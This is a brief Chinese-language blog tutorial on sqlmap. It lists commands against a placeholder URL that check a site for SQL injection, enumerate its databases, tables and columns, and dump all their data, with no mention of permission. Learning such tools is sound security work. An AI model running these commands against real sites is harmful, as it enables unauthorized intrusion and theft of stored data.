美文网首页sql注入
SQL注入 注入工具sqlmap

SQL注入 注入工具sqlmap

作者: dawsonenjoy | 来源:发表于2018-09-29 21:46 被阅读10次

使用

下载sqlmap后,通过命令行cd到sqlmap地址下,打开sqlmap.py(python版本要在2.7以内)

基本语句

1.判断某网址是否可注入:

sqlmap.py -u "要测试的地址"

2.当出现下图所示说明其发现id是可注入的,是否还需要测试其他参数是否可注入(例如url后面是id=1&user=aaa),此时如果选否,则直接进行注入判断,选是则会判断user是否可注入

3.当确认可以注入时判断数据库:

sqlmap.py -u "要测试的地址" --dbs

4.如果只有一个数据库之类时,则可能上面的语句无效,这时可以直接查表名:

sqlmap.py -u "要测试的地址" --tables

5.如果查到数据库,要查数据库下相关表名:

sqlmap.py -u "要测试的地址" -D [指定数据库名] --tables

6.获取列名:

sqlmap.py -u "要测试的地址" -D [指定数据库] -T [指定表] --columns

7.获取数据名:

sqlmap.py -u "要测试的地址" -D [指定数据库] -T [指定表] -C [指定列,如果多个用引号包起来,里面用逗号隔开] --dump

8.注:以上直接--tables--columns--dump不指定其他的话将会去获取所有的数据,例如直接地址后面--dump,则当前数据库内所有表名、列名、数据都会获取

相关文章

  • 墨者学院-SQL注入漏洞测试(布尔盲注)

    题目分析 界面上的连接地址存在sql注入点image.png 工具注入(sqlmap)。 sqlmap -u 注入...

  • sqlmap使用

    1. sqlmap简介 SQLmap是一款用来检测与利用SQL漏洞的注入神器。开源的自动化SQL注入工具,由Pyt...

  • SQL注入 注入工具sqlmap

    使用 下载sqlmap后,通过命令行cd到sqlmap地址下,打开sqlmap.py(python版本要在2.7以...

  • BurpSuite搭配Sqlmap进行自动化SQL注入测试

    BurpSuite搭配Sqlmap进行自动化SQL注入测试 使用gason插件+SqlMap测试SQL注入漏洞 s...

  • 小迪16期-20170408

    安全狗防护注入及绕过思路Sqlmap tamper插件分析. sql注入绕过思路一:提交方式更改注入sql注入绕过...

  • python优秀项目总结

    sql注入工具: sqlmap DNS安全监测: [DNSRecon]https://github.com/dar...

  • SQL注入漏洞测试的方式总结

    一、工具注入 1.SQLMap的作用 判断可注入的参数 判断可以用那种SQL注入技术来注入 识别出哪种数据库 根据...

  • sqlmap使用手册

    一、概述 1.1 简介 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它...

  • sqlmapapi使用中遇到的问题

    sqlmap可谓是sql注入探测的神器,但是利用sqlmap测试SQL注入的效率很低,每一个url都需要手动测试。...

  • Sql注入之sqlmapapi介绍

    sqlmap可谓是sql注入探测的神器,但是利用sqlmap测试SQL注入的效率很低,每一个url都需要手动测试。...

网友评论

    本文标题:SQL注入 注入工具sqlmap

    本文链接:https://www.haomeiwen.com/subject/lcbgnftx.html